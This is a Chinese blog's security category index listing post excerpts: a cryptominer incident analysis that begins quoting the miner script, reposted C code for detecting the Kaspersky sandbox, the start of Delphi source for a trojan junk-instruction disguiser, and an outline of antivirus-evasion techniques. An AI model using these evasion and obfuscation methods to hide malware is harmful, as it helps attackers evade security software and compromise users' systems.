随笔分类 -  安全

记一次挖矿病毒solr
摘要:1 病毒出现 2 后来发现有个定时任务 3 去网址查看 4 把这个脚本拉下来 #!/bin/sh export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin ps aux | grep -v grep | grep 'givemexyz' | a 阅读全文
posted @ 2022-12-06 17:10 谭志宇 阅读(362) 评论(0) 推荐(0) 编辑
(转)检测Kaspersky沙盒之DeleteFile大法
摘要:#include <windows.h>#include <stdio.h>#include <tlhelp32.h>////Define//int DetectSandBox(void);////Routine//int DetectSandBox(void){ // //Routine Description: // //This routine detec... 阅读全文
posted @ 2010-02-03 23:54 谭志宇 阅读(306) 评论(0) 推荐(0) 编辑
(转)Delphi版木马彩衣一个简单的花指令伪装器--
摘要:附程序源码,有很多地方需要改进{pe花指令加密,参考 fi7ke 的 PE花指令加密一文Author:hnxyy QQ:19026695 2005.11.24 说明:以VC++6的花指令为例说明//VC++6外衣 1OEPCODEFIVE: THEAD =($55, $8B, $EC, $6A, $FF, $68, $00, $00, $00, $00, $68, $00, $00, $00, $... 阅读全文
posted @ 2009-10-22 04:06 谭志宇 阅读(827) 评论(0) 推荐(0) 编辑
免杀常用手段
摘要:首先做免杀大家都知道免杀分为文件免杀,内存免杀,和行为免杀。 /通用转跳发:就是把特征码跳转到0区域,运行完后在跳回原地继续运行。 | | /上移法:根据代码的特点把特征码向上移动.\ |特征码移动法: |有时候是整个区段上移以后介绍 | \下移法:根据代码的特点把特征码向下移动./ | |PE资源移动:把特征区段上下移动,在C32下在修正.(无名哥哥教的)终于会了!不容易啊!! | /修改特征码... 阅读全文
posted @ 2009-10-22 02:26 谭志宇 阅读(972) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示